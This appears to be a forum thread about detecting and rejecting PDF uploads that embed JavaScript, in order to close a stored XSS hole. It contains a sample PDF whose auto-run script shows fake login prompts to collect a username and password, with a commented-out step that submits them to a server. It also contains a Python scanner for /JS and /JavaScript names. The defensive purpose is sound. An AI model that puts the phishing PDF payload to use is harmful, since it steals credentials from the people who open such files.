Thomas Hoevel wrote:
We don't have a sample yet.
There are quite a few places where JavaScript actions can be used, so to detect any JavaScript code, a lot of checks must be made.
Checks will be much easier if you can narrow down the list of JavaScript actions that matter for you.
Well, I'm trying to close a stored XSS vulnerability in a PDF file, which is why I need to detect and reject any PDF file that has JavaScript embedded.
Here's one of the stored XSS examples:
Code:
%PDF-1.7
1 0 obj
<</Type /Catalog /Pages 2 0 R /OpenAction 3 0 R>>
endobj
2 0 obj
<</Type /Pages /Kids [4 0 R] /Count 1>>
endobj
3 0 obj
<</Type /Action /S /JavaScript /JS (
var user = app.response({
cQuestion: 'Enter your username',
cTitle: 'Login Required',
bPassword: false,
cLabel: 'Username:'
});
var pass = app.response({
cQuestion: 'Enter your password',
cTitle: 'Login Required',
bPassword: true,
cLabel: 'Password:'
});
var userEncoded = encodeURIComponent(user);
var passEncoded = encodeURIComponent(pass);
//var sendData = 'user' + encodeURIComponent(user) + '&pass' + encodeURIComponent(pass);
//this.submitForm({
// cURL: server + '?' + sendData,
//cSubmitAs: 'HTML'
//});
)>
endobj
4 0 obj
<</Type /Page /Parent 2 0 R /MediaBox [0 0 612 792]>>
endobj
trailer
<</Root 1 0 R>>
%%EOF
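
A minimal upload check for the requirement described in this thread, as an added example that is not part of the original posts or of any library discussed here. Rather than checking each place an action can be attached, it scans for the `/JS` and `/JavaScript` name tokens themselves, including `#xx`-escaped spellings and names inside Flate-compressed streams. The function names and the sample bytes are constructed for illustration, and the packed sample is a simplified stand-in for a real object stream.

```python
import re
import zlib

SCRIPT_NAMES = {b"JS", b"JavaScript"}    # keys/values that carry a script action
TRIGGER_NAMES = {b"OpenAction", b"AA"}   # automatic triggers, reported for context
# A PDF name: "/" followed by any bytes that are not whitespace or delimiters.
NAME_RE = re.compile(rb"/([^\x00\t\n\x0c\r ()<>\[\]{}/%]+)")
STREAM_RE = re.compile(rb"stream\r?\n(.*?)endstream", re.S)

def decode_name(raw):
    """Undo #xx escapes so that /J#53 compares equal to /JS."""
    return re.sub(rb"#([0-9A-Fa-f]{2})", lambda m: bytes([int(m.group(1), 16)]), raw)

def names_in(data):
    return {decode_name(m.group(1)) for m in NAME_RE.finditer(data)}

def scan_pdf(data):
    """Collect name tokens from the raw file and from Flate-compressed streams."""
    found, opaque = names_in(data), 0
    for m in STREAM_RE.finditer(data):
        try:
            # decompressobj tolerates the end-of-line bytes before "endstream"
            found |= names_in(zlib.decompressobj().decompress(m.group(1)))
        except zlib.error:
            opaque += 1  # not Flate data (image, other filter, encrypted)
    script = found & SCRIPT_NAMES
    return {
        "script": sorted(n.decode() for n in script),
        "triggers": sorted(n.decode() for n in found & TRIGGER_NAMES),
        "encrypted": b"Encrypt" in found,
        "opaque_streams": opaque,
        "reject": bool(script),
    }

# Constructed samples; the script body is a placeholder.
PLAIN = (b"%PDF-1.7\n1 0 obj\n<</Type /Catalog /OpenAction 3 0 R>>\nendobj\n"
         b"3 0 obj\n<</Type /Action /S /JavaScript /JS (placeholder)>>\nendobj\n")
ESCAPED = PLAIN.replace(b"/JavaScript", b"/J#61vaScript").replace(b"/JS", b"/J#53")
PACKED = (b"%PDF-1.7\n5 0 obj\n<</Type /ObjStm /Filter /FlateDecode>>\nstream\n"
          + zlib.compress(b"<</S /JavaScript /JS (placeholder)>>")
          + b"\nendstream\nendobj\n")
CLEAN = b"%PDF-1.7\n1 0 obj\n<</Type /Catalog /Pages 2 0 R>>\nendobj\n"

if __name__ == "__main__":
    for label, pdf in [("plain", PLAIN), ("escaped", ESCAPED),
                       ("packed", PACKED), ("clean", CLEAN)]:
        print(label, scan_pdf(pdf))
```

Matching raw tokens errs toward rejecting, since a `/JS` sequence inside ordinary text content also counts. A file reported as `encrypted` or with `opaque_streams` may hold objects this scan cannot read, so those need a full parser or a stricter policy.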